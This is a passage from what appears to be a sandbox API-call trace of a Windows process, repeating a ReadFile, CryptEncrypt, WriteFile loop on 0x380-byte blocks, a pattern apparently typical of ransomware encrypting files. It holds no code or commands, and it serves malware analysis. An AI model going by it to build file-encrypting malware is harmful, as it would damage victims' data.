lpOverlapped=0x0) returned 1 [0268.784] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.785] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.785] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.786] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.786] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.787] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.787] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.788] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.788] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.789] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.789] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.790] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.790] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.791] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.792] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.793] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.794] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, 